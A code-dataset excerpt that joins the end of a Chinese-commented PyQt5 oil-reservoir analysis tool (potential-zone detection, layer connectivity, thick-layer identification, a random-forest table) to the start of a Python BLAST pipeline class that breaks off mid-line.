dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n\n pross = 1\n index = 0\n for qlqFloorName in self.qlqFloor:\n\n\n dlgProgress.setValue(pross)\n dlgProgress.setLabelText(\"正在筛选数据,第 %d 个\" % pross)\n\n x = BHD[qlqFloorName][0] # float 型\n y = BHD[qlqFloorName][1]\n v = BHD[qlqFloorName][2]\n\n for i in range(len(v)):\n if v[i] == -999:\n v[i] = 0\n\n x = np.array(x)\n y = np.array(y)\n v = np.array(v)\n\n x = x.T\n y = y.T\n v = v.T\n\n xb = list(range(int(min(x)), int(max(x)), self.stepx))\n yb = list(range(int(min(y)), int(max(y)), self.stepy))\n\n xb = np.array(xb)\n yb = np.array(yb)\n\n xb, yb = np.meshgrid(xb, yb)\n\n bhdq = griddata((x, y), v, (xb, yb), method=\"linear\")\n\n floor = CJDYSJ[qlqFloorName] # float 型\n sycd = {}\n\n floor = np.array(floor)\n floor = floor.T\n floor = floor.tolist()\n # wellNum = floor[2]\n x = []\n y = []\n\n bj1 = 1\n bj2 = 1\n yxhd = []\n yxhd1 = float(floor[13][0])\n kxd = []\n kxd1 = float(floor[14][0])\n stl = []\n stl1 = float(floor[15][0])\n wellNum = []\n\n for i in range(1, len(floor[0]) - 1):\n if floor[2][i] == floor[2][i - 1]:\n\n yxhd1 = yxhd1 + float(floor[13][i])\n if float(floor[14][i]) == 0:\n kxd1 = kxd1 + float(floor[14][i])\n else:\n bj1 = bj1 + 1\n kxd1 = kxd1 + float(floor[14][i])\n\n if float(floor[15][i]) == 0:\n stl1 = stl1 + float(floor[15][i])\n else:\n bj2 = bj2 + 1\n stl1 = stl1 + float(floor[15][i])\n else:\n for j in range(len(DJDZSJ)):\n if floor[2][i - 1] == list(DJDZSJ.keys())[j]:\n if DJDZSJ[list(DJDZSJ.keys())[j]][2] == '0':\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][0])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][1])\n else:\n y.append(DJDZSJ[list(DJDZSJ.keys())[j]][2])\n x.append(DJDZSJ[list(DJDZSJ.keys())[j]][3])\n wellNum.append(floor[2][i - 1])\n yxhd.append(str(yxhd1))\n kxd.append(str(kxd1 / bj1))\n stl.append(str(stl1 / bj2))\n\n bj1 = 1\n bj2 = 1\n yxhd1 = float(floor[13][i])\n kxd1 = float(floor[14][i])\n stl1 = float(floor[15][i])\n\n x = np.array(x)\n y = np.array(y)\n yxhd = np.array(yxhd)\n stl = np.array(stl)\n kxd = np.array(kxd)\n\n x = x.T\n y = y.T\n yxhd = yxhd.T\n stl = stl.T\n kxd = kxd.T\n\n yxhdq = griddata((x, y), yxhd, (xb, yb), method=\"linear\")\n stlq = griddata((x, y), stl, (xb, yb), method=\"linear\")\n kxdq = griddata((x, y), kxd, (xb, yb), method=\"linear\")\n\n # print(yxhdq.shape)\n # print(stlq.shape)\n # print(bhdq.shape)\n\n\n qlq = yxhdq.copy()\n\n for i in range(bhdq.shape[0]):\n for j in range(bhdq.shape[1]):\n if np.isnan(bhdq[i][j]) == False and np.isnan(stlq[i][j]) == False and np.isnan(\n yxhdq[i][j]) == False:\n if stlq[i][j] > 0.15 and bhdq[i][j] > 0.45 and yxhdq[i][j] > 2:\n qlq[i][j] = 1\n else:\n qlq[i][j] = 0\n\n self.qlqBinary[qlqFloorName] = qlq\n self.qlqXb[qlqFloorName] = xb\n self.qlqYb[qlqFloorName] = yb\n\n\n contours = measure.find_contours(qlq, 0.4)\n\n\n for n, contour in enumerate(contours):\n for i in range(contour.shape[0]):\n xcontour = round(contour[i][1])\n ycontour = round(contour[i][0])\n\n contour[i][1] = xcontour * self.stepx + xb[0][0]\n contour[i][0] = ycontour * self.stepy + yb[0][0]\n\n areaX = int(self.ui.lineEdit_3.text())\n areaY = int(self.ui.lineEdit_4.text())\n\n self.qlqContours[qlqFloorName] = []\n\n for _, contour in enumerate(contours):\n qlqTableRow = {}\n\n contour = np.float32(contour)\n # 计算最小内接矩形\n rect = cv2.minAreaRect(contour)\n area = cv2.contourArea(contour)\n qlqTableRow[\"floor\"] = qlqFloorName\n qlqTableRow[\"area\"] = area\n\n # 提取矩形的关键信息\n center, size, angle = rect\n width, height = size\n if width > areaX and height > areaY:\n index = index + 1\n qlqTableRow[\"index\"] = index\n\n self.qlqContours[qlqFloorName].append(contour)\n minx = min(contour[:,1])\n miny = min(contour[:,0])\n maxx = max(contour[:,1])\n maxy = max(contour[:,0])\n well = []\n\n x = np.float32(x)\n y = np.float32(y)\n\n for i in range(len(wellNum)):\n if minx < x[i] < maxx and miny < y[i] < maxy:\n well.append(wellNum[i])\n\n qlqTableRow[\"well\"] = well\n\n n = 0\n sumStl = 0\n sumYxhd = 0\n sumBhd = 0\n sumKxd = 0\n for i in range(bhdq.shape[0]):\n for j in range(bhdq.shape[1]):\n if minx <= xb[i][j] <= maxx and miny <= yb[i][j] <= maxy and qlq[i][j] == 1:\n n = n + 1\n sumBhd = sumBhd + bhdq[i][j]\n sumStl = sumStl + stlq[i][j]\n sumYxhd = sumYxhd + yxhdq[i][j]\n sumKxd = sumKxd + kxdq[i][j]\n\n avStl = sumStl / n\n avBhd = sumBhd / n\n avYxhd = sumYxhd / n\n avKxd = sumKxd / n\n qlqTableRow[\"avStl\"] = avStl\n qlqTableRow[\"avBhd\"] = avBhd\n qlqTableRow[\"avYxhd\"] = avYxhd\n qlqTableRow[\"avKxd\"] = avKxd\n qlqTableRow[\"syyl\"] = avKxd * avBhd * avYxhd * area\n avsycd = ''\n D = 0\n Z = 0\n G = 0\n for i in well:\n try:\n if sycd[i] == 'D':\n D = D + 1\n if sycd[i] == 'Z':\n Z = Z + 1\n if sycd[i] == 'G':\n G = G + 1\n except KeyError:\n print(KeyError)\n\n if G > Z and G > D:\n avsycd = \"高\"\n if Z > G and Z > D:\n avsycd = \"中\"\n if D > G and D > Z:\n avsycd = \"低\"\n\n qlqTableRow[\"avsycd\"] = avsycd\n self.qlqTable[index] = qlqTableRow\n\n print(\"pushBotton\")\n pross = pross + 1\n self.ui.tableWidget.setRowCount(index)\n self.ui.tableWidget.setAlternatingRowColors(True)\n\n\n for i in range(1,index):\n listrow = []\n\n # 潜力区编号\n listrow.append(self.qlqTable[i][\"index\"])\n self.ui.comboBox_2.addItem(str(self.qlqTable[i][\"index\"]))\n item = QTableWidgetItem(str(self.qlqTable[i][\"index\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 0,item)\n\n # 层号\n listrow.append(self.qlqTable[i][\"floor\"])\n item = QTableWidgetItem(self.qlqTable[i][\"floor\"])\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 1,item)\n\n # 平面规模\n listrow.append(self.qlqTable[i][\"area\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"area\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 2,item)\n\n # 平均含油饱和度\n listrow.append(self.qlqTable[i][\"avBhd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avBhd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 3,item)\n\n # 平均有效厚度\n listrow.append(self.qlqTable[i][\"avYxhd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avYxhd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 4,item)\n\n # 平均渗透率\n listrow.append(self.qlqTable[i][\"avStl\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avStl\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 5,item)\n\n # 平均孔隙度\n listrow.append(self.qlqTable[i][\"avKxd\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"avKxd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 6,item)\n\n # 剩余油量\n listrow.append(self.qlqTable[i][\"syyl\"])\n item = QTableWidgetItem(str(self.qlqTable[i][\"syyl\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 7,item)\n\n # 井数量\n listrow.append(len(self.qlqTable[i][\"well\"]))\n item = QTableWidgetItem(str(len(self.qlqTable[i][\"well\"])))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 8,item)\n\n # 平均水淹程度\n if self.qlqTable[i][\"avsycd\"] == \"高\":\n listrow.append(3)\n if self.qlqTable[i][\"avsycd\"] == \"中\":\n listrow.append(2)\n if self.qlqTable[i][\"avsycd\"] == \"低\":\n listrow.append(1)\n item = QTableWidgetItem(str(self.qlqTable[i][\"avsycd\"]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget.setItem(i-1, 9,item)\n\n # a = random.randrange(0, 2, 1)\n # listrow.append(a)\n self.qlqTableList.append(listrow)\n\n\n\n\n\n\n\n\n @pyqtSlot()\n def on_pushButton_clicked(self):\n\n comBoxText = self.ui.comboBox.currentText()\n\n title = comBoxText + \"潜力区\"\n fig1 = QmyFigure(self)\n fig1.setAttribute(Qt.WA_DeleteOnClose)\n curIndex = self.ui.tabWidget.addTab(fig1, title) # 添加到tabWidget\n self.ui.tabWidget.setCurrentIndex(curIndex)\n\n\n\n ax1 = fig1.fig.add_subplot(1, 1, 1) # 子图1\n ax1.set_xlabel('X 轴') # X轴标题\n ax1.set_ylabel('Y 轴') # Y轴标题\n ax1.set_title(title)\n\n im1 = ax1.pcolormesh(self.qlqXb[comBoxText], self.qlqYb[comBoxText], self.qlqBinary[comBoxText])\n fig1.fig.colorbar(im1, ax=ax1)\n\n\n\n for n, contour in enumerate(self.qlqContours[comBoxText]):\n\n ax1.plot(contour[:, 1], contour[:, 0], linewidth=2)\n\n print(\"pushBotton\")\n\n @pyqtSlot(str) #层间联通性判断得下拉列表变化时运行得函数\n def on_comboBox_2_activated(self, curText):\n\n comBoxzhi = int(self.ui.comboBox_2.currentText())\n\n # print(self.qlqTableList)\n # print(self.qlqTable[comBoxzhi][\"well\"])\n\n CJLTX = []#层间连通性\n CJLTXTJ = []#层间连通性统计\n\n blt = 0 # 不连通\n slt = 0 # 上连通\n xlt = 0 # 下连通\n jlt = 0 # 均连通\n\n if len(self.qlqTable[comBoxzhi][\"well\"]) == 0:\n print('潜力区内无注采井')\n else:\n for i in range(len(self.qlqTable[comBoxzhi][\"well\"])):\n CJLTX1 = []\n CJLTX1.append(self.qlqTable[comBoxzhi][\"well\"][i])\n bj = 0\n bj1 = 0\n for j in range(1,len(CJDYZB)):\n if self.qlqTable[comBoxzhi][\"well\"][i] == (CJDYZB[str(j)][0][2]):\n ch = CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]#%合并层号\n if ch == self.qlqTableList[comBoxzhi][1]:\n bj = bj + 1\n if bj == 1:\n for k in range(j-1,j-50,-1):\n if bj1 == 0:\n if CJDYZB[str(k)][0][9] != 0:\n bj1 = bj1 + 1\n CJLTX1.append(float(CJDYZB[str(k)][0][8]) + float(CJDYZB[str(k)][0][9]))\n CJLTX1.append(float(CJDYZB[str(j)][0][8]))\n CJLTX1.append(float(CJDYZB[str(j)][0][8]) + float(CJDYZB[str(j)][0][9]))\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1.append(float(CJDYZB[str(j+1)][0][8]))\n elif CJDYZB[str(j)][0][8] == '0':\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1[4] = float(CJDYZB[str(j+1)][0][8])\n elif CJDYZB[str(j)][0][8] != '0':\n CJLTX1[3] = float(CJDYZB[str(j)][0][8]) + float(CJDYZB[str(j)][0][9])\n if CJDYZB[str(j+1)][0][8] != 0:\n CJLTX1[4] = float(CJDYZB[str(j + 1)][0][8])\n\n if CJLTX1[2] != []:\n if CJLTX1[2] - CJLTX1[1] > 0.5:\n if CJLTX1[4] - CJLTX1[3] > 0.5:\n CJLTX1.append(0)\n blt = blt + 1\n else:\n CJLTX1.append(2)\n xlt = xlt + 1\n else:\n if CJLTX1[4] - CJLTX1[3] > 0.5:\n CJLTX1.append(1)\n slt = slt + 1\n else:\n CJLTX1.append(3)\n jlt = jlt + 1\n CJLTX.append(CJLTX1)\n #print(CJLTX1)#单井层间连通性统计数据\n CJLTXTJ.append('上下不连通')\n CJLTXTJ.append(blt)\n CJLTXTJ.append('上连通')\n CJLTXTJ.append(slt)\n CJLTXTJ.append('下连通')\n CJLTXTJ.append(xlt)\n CJLTXTJ.append('上下均连通')\n CJLTXTJ.append(jlt)\n\n print(CJLTX)#所选潜力区的所有井层间连通性表\n print(CJLTXTJ)#所选潜力区的所有井层间连通性统计表\n\n headerText = [\"包含井号\", \"上层砂岩底深\", \"砂岩顶深\", \"砂岩底深\", \"下层砂岩顶深\", \"层间连通性\"]\n self.ui.tableWidget_3.setColumnCount(len(headerText))\n self.ui.tableWidget_3.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_3.clearContents()\n self.ui.tableWidget_3.setRowCount(len(CJLTX))\n self.ui.tableWidget_3.setAlternatingRowColors(True)\n\n\n for i in range(0,len(CJLTX)):\n for j in range(0,len(CJLTX[0])):\n\n item = QTableWidgetItem(str(CJLTX[i][j]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_3.setItem(i, j, item)\n\n\n headerText = [\"连通情况\", \"潜力区井数量\"]\n self.ui.tableWidget_2.setColumnCount(len(headerText))\n self.ui.tableWidget_2.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_2.clearContents()\n self.ui.tableWidget_2.setRowCount(4)\n self.ui.tableWidget_2.setAlternatingRowColors(True)\n\n\n item = QTableWidgetItem(str(CJLTXTJ[0]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文���\n self.ui.tableWidget_2.setItem(0, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[1]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(0, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[2]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(1, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[3]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(1, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[4]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(2, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[5]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(2, 1, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[6]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(3, 0, item)\n\n item = QTableWidgetItem(str(CJLTXTJ[7]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_2.setItem(3, 1, item)\n\n # 厚层识别按钮\n @pyqtSlot()\n def on_pushButton_11_clicked(self):\n\n HCSBB1 = [] #厚层识别表,删除无厚层的井号\n CJDYJH = [] #沉积单元井号\n pross = 1\n\n for i in range(1,len(CJDYZB)):\n if i == 1:\n CJDYJH.append(CJDYZB[str(i)][0][2])\n else:\n if CJDYJH[len(CJDYJH)-1] != CJDYZB[str(i)][0][2]:\n CJDYJH.append(CJDYZB[str(i)][0][2])\n\n\n labText = \"正在厚层识别...\" # 文本信息\n btnText = \"取消\" # \"取消\"按钮的标\n minV = 0\n maxV = len(CJDYJH)\n\n dlgProgress = QProgressDialog(labText, btnText, minV, maxV, self)\n dlgProgress.setWindowTitle(\"厚层识别\")\n dlgProgress.setWindowModality(Qt.WindowModal) # 模态对话框\n dlgProgress.setAutoReset(True) # value()达到最大值时自动调用reset()\n dlgProgress.setAutoClose(True) # 调用reset()时隐藏窗口\n\n\n for i in range(len(CJDYJH)):\n\n dlgProgress.setValue(pross)\n dlgProgress.setLabelText(\"正在分析第 %d 口井\" %pross)\n\n ch = []\n HCSBB = []\n HCSBB.append(CJDYJH[i])\n syhd = 0 #砂岩厚度,记录叠加厚层的砂岩厚度\n yxhd = 0 #有效厚度,记录叠加厚层的有效厚度\n bj = 0 #标记,用于标记单井是否有多段厚层\n bj1 = 0 #标记,用于删除0数值行\n\n for j in range(1,len(CJDYZB)):\n if CJDYJH[i] == CJDYZB[str(j)][0][2]:\n a = float(CJDYZB[str(j)][0][8])#第一个砂岩顶深\n if a != 0: # 第一个砂岩顶深不能为零\n b = float(CJDYZB[str(j)][0][9]) #第一个砂岩层厚\n d = float(CJDYZB[str(j)][0][13]) #第一个有效厚度\n\n c = float(CJDYZB[str(j+1)][0][8]) #第二个砂岩顶深\n\n for m in range(j+2, j+20):\n if bj1 == 0:\n if c == 0: #第二个砂岩顶深不能为零\n c = float(CJDYZB[str(m)][0][8])\n else:\n bj1 = 1\n\n if c == a + b: #判断条件,第二个砂岩顶深=第一个砂岩顶深+第一个砂岩层厚\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) #合并层号,提取出第一个砂岩顶深所在的层号\n syhd = syhd + b\n yxhd = yxhd + d\n else:\n if syhd >= 5:\n if bj == 0:\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) #合并层号,提取出第一个砂岩顶深所在的层号\n HCSBB.append(syhd)\n HCSBB.append(yxhd)\n for n in range(len(ch)):\n HCSBB.append(ch[n])\n bj = 1\n ch = []\n syhd = 0\n yxhd = 0\n print(HCSBB)\n else:\n HCSBB1.append(HCSBB)\n HCSBB = []\n HCSBB.append(CJDYJH[i])\n ch.append(CJDYZB[str(j)][0][3] + \"-\" + CJDYZB[str(j)][0][4]) #合并层号,提取出第一个砂岩顶深所在的层号\n HCSBB.append(syhd)\n HCSBB.append(yxhd)\n for n in range(len(ch)):\n HCSBB.append(ch[n])\n bj = 1\n ch = []\n syhd = 0\n yxhd = 0\n else:\n ch = []\n syhd = 0\n yxhd = 0\n\n if len(HCSBB) != 1:\n HCSBB1.append(HCSBB)\n print(HCSBB1)\n\n pross = pross + 1\n\n print(HCSBB1)\n\n headerText = [\"井号\", \"总砂岩厚度\",\"总有效厚度\",\"层位1\",\"层位2\",\"层位3\",\"层位4\",\"层位5\",\"层位6\"]\n self.ui.tableWidget_5.setColumnCount(len(headerText))\n self.ui.tableWidget_5.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_5.clearContents()\n self.ui.tableWidget_5.setRowCount(len(HCSBB1))\n self.ui.tableWidget_5.setAlternatingRowColors(True)\n\n for i, row in enumerate(HCSBB1):\n for j, a in enumerate(row):\n item = QTableWidgetItem(str(a))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_5.setItem(i, j, item)\n\n # 随机森林模型按钮\n @pyqtSlot()\n def on_pushButton_4_clicked(self):\n Y = []\n for i, _ in enumerate(self.qlqTableList):\n Y.append(random.randrange(0, 2, 1))\n\n # 设置弱学习器数量为10\n self.model = RandomForestClassifier(n_estimators=10, random_state=123)\n X = [row[2:] for row in self.qlqTableList]\n self.model.fit(X, Y)\n\n dlgTitle = \"提示\"\n strInfo = \"模型已经被正确导入.\"\n QMessageBox.information(self, dlgTitle, strInfo)\n\n # print(model.predict(X))\n\n @pyqtSlot()\n def on_pushButton_5_clicked(self):\n X = [row[2:] for row in self.qlqTableList]\n Y = self.model.predict(X)\n headerText = [\"潜力区序号\", \"层号\", \"平面规模\", \"平均含油饱和度\", \"平均有效厚度\", \"平均渗透率\",\"平均孔隙度\",\"剩余油量\",\"井数量\",\"平均水淹程度\",\"随机森林评价\"]\n self.ui.tableWidget_4.setColumnCount(len(headerText))\n self.ui.tableWidget_4.setHorizontalHeaderLabels(headerText)\n self.ui.tableWidget_4.clearContents()\n self.ui.tableWidget_4.setRowCount(len(self.qlqTableList))\n self.ui.tableWidget_4.setAlternatingRowColors(True)\n\n for i, row in enumerate(self.qlqTableList):\n\n for j, a in enumerate(row):\n\n item = QTableWidgetItem(str(a))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_4.setItem(i, j, item)\n\n item = QTableWidgetItem(str(Y[i]))\n item.setTextAlignment(Qt.AlignHCenter | Qt.AlignVCenter)\n item.setFlags(Qt.ItemIsSelectable | Qt.ItemIsEnabled\n | Qt.ItemIsUserCheckable) # 不允许编辑文字\n self.ui.tableWidget_4.setItem(i, 10, item)\n\n print(\"评价完成\")\n\n\n\n\n\n\n\nif __name__ == \"__main__\": # 用于当前窗体测试\n app = QApplication(sys.argv) # 创建GUI应用程序\n form = QmyMainWindow() # 创建窗体\n form.show()\n sys.exit(app.exec_())\n","repo_name":"jiangdaisy/Complex_structure_well_design_software","sub_path":"CSW_sjk_Slot.py","file_name":"CSW_sjk_Slot.py","file_ext":"py","file_size_in_byte":69081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2577809067","text":"# File: blast.py\n# Author: Harrison Inocencio\n# Date: 07-24-18\n# Purpose: Contains the blastBranch object, which runs all operations\n#\t\t related to the pipes BLAST branch\n\n# Notes:\n# 1.\n# 2.\n# 3.\n# 4.\n# 5.\n\n# TODO:\n# 1. \n# 2.\n# 3.\n# 4.\n# 5.\n\n# -------------------------------------------------------------------\n\nimport os\nimport subprocess\nimport lib.args as args\nimport lib.plumber as plumber\nfrom Bio import SeqIO\nfrom lib.qSeq import qSeq\n\n# blastBranch class\nclass blastBranch:\n\t\"\"\"\n\tThis class contains all atr/functions needed to execute the blast\n\tbranch portion of the pipeline. Generates BLAST databases, blastn \n\truns, and exports reports\n\t\"\"\"\n\n\t# __init__ func\n\t# Initializes passed attributes\n\tdef __init__(self, blast_path, sample_pit, query_fpath):\n\t\tself.base_blast_path = blast_path\n\t\tself.sample_pit = sample_pit\n\t\tself.query_fpath = query_fpath\n\t\tself.db_bucket = []\n\t\tself.qSeq_list = []\n\n\t# __format_id func\n\t# Removes periods/spaces from the passed id and returns a the new id\n\t# Used for creating the listed query file names\n\tdef __format_id(self, rec_id):\n\t\tnew_id = \"\"\n\t\tfor char in rec_id:\n\t\t\tif char != '.' and char != \" \":\n\t\t\t\tnew_id+=char\n\t\t\telse:\n\t\t\t\tnew_id+='_'\n\n\t\treturn new_id\n\n\t# __split_queries func\n\t# Splits the query fasta entries into individual files for blasting\n\t# sets the query_list atr\n\tdef __split_queries(self):\n\t\tquery_recs = []\n\t\tfor rec in SeqIO.parse(self.query_fpath, \"fasta\"):\n\t\t\tquery_recs.append(rec)\n\t\n\t\tquery_list = []\n\t\tquery_path = self.base_blast_path + args.query_dir\n\t\tplumber.force_dir(query_path)\n\t\tfor rec in query_recs:\n\t\t\twrite_out = [rec]\n\t\t\twrite_path = query_path+self.__format_id(rec.id)+\".fasta\"\n\t\t\tSeqIO.write(write_out, write_path, \"fasta\")\n\t\t\tquery_list.append(write_path)\n\t\t\t\n\t\treturn query_list\n\n\t# __gen_db_path func\n\t# creates and the blast database directory for a passe sampleBall\n\t# returns the complete db name for the makeblastdb process\n\tdef __gen_db_path(self, sball, bucket_path):\n\t\tdir_name = os.path.basename(sball.export_fasta).split(\".\")[0]\n\t\tdir_name += \"_db/\"\n\t\tdb_name = os.path.basename(sball.export_fasta).split(\".\")[0]\n\t\tdb_name += \"_genome.fasta\"\n\t\tdir_path = bucket_path + dir_name\n\t\tplumber.force_dir(dir_path)\n\t\t\n\t\treturn dir_path + db_name\n\n\t# __build_bucket func\n\t# builds blast databases from all samples in sample_pit\n\t# sets the db_bucket atr\n\tdef __build_bucket(self):\n\t\tbucket_path = self.base_blast_path + args.bucket_dir\n\t\tplumber.force_dir(bucket_path)\n\t\tfor sball in self.sample_pit:\n\t\t\tprint(\"\\t\\tMaking database for sample\", sball.sample_id)\n\t\t\tout_path = self.__gen_db_path(sball, bucket_path)\n\t\t\tblast_cmd = [\"makeblastdb\", \"-in\", sball.export_fasta,\n\t\t\t\t\t\t\"-dbtype\", \"nucl\", \"-out\", out_path]\n\t\t\ttry:\n\t\t\t\tblast_ret = subprocess.run(blast_cmd, \n\t\t\t\t\t\t\t\t\t\tstdout=subprocess.PIPE,\n\t\t\t\t\t\t\t\t\t\tstdin=subprocess.PIPE, check=True,\n\t\t\t\t\t\t\t\t\t\tuniversal_newlines=True)\n\t\t\texcept subprocess.CalledProcessError as perror:\n\t\t\t\traise(RuntimeError(\"ERROR: makeblastdb failed!\"))\n\n\t\t\tself.db_bucket.append(out_path)\n\n\t# __build_qSeqs func\n\t# Builds a list of all qSeq objects using query_list and the db_bucket\n\tdef __build_qSeqs(self, query_list):\n\t\tfor query_path in query_list:\n\t\t\tnew_qSeq = qSeq(query_path, self.db_bucket)\n\t\t\tself.qSeq_list.append(new_qSeq)\n\n\t# __blast_all func\n\t# Calls the bucket_blast function on each qSeq obj in qSeq_list\n\tdef __blast_all(self):\n\t\tarchive_path = self.base_blast_path + args.archive_dir\n\t\tplumber.force_dir(archive_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tBlasting %s against bucket ...\" % query.query_name)\n\t\t\tquery.bucket_blast(archive_path)\n\n\t# __gen_hr_reports func\n\t# Converts the archive to human readable reports\n\tdef __gen_hr_reports(self):\n\t\treports_path = self.base_blast_path + args.report_dir\n\t\tplumber.force_dir(reports_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tBuilding reports for %s ...\" % query.query_name)\n\t\t\tquery.convert_hr_reports(reports_path)\n\n\t# Extracts the hit subject sequences and writes them\n\t# to their own fastas\n\tdef __extract_sub_seqs(self):\n\t\tsub_seq_path = self.base_blast_path + args.sub_seq_dir\n\t\tplumber.force_dir(sub_seq_path)\n\t\tfor query in self.qSeq_list:\n\t\t\tprint(\"\\t\\tBuilding reports for %s ...\" % query.query_name)\n\t\t\tquery.get_sub_seqs(sub_seq_path)\n\n\t# run func\n\t# Starts the blast branch\n\tdef run(self):\n\t\tprint(\"\\tBLASTER alive and running ...\")\n\t\tprint(\"\\tSplitting queries ...\")\n\t\tquery_list = self.__split_queries()\n\t\tprint(\"\\tBuiding database bucket ...\")\n\t\tself.__build_bucket()\n\t\tself.__build_qSeqs(query_list)\n\t\tprint(\"\\tBeginning bucket blasts ...\")\n\t\tself.__blast_all()\n\t\tprint(\"\\tBuilding HR reports ...\")\n\t\tself.__gen_hr_reports()\n\t\tprint(\"\\tExtracting subject seq fastas 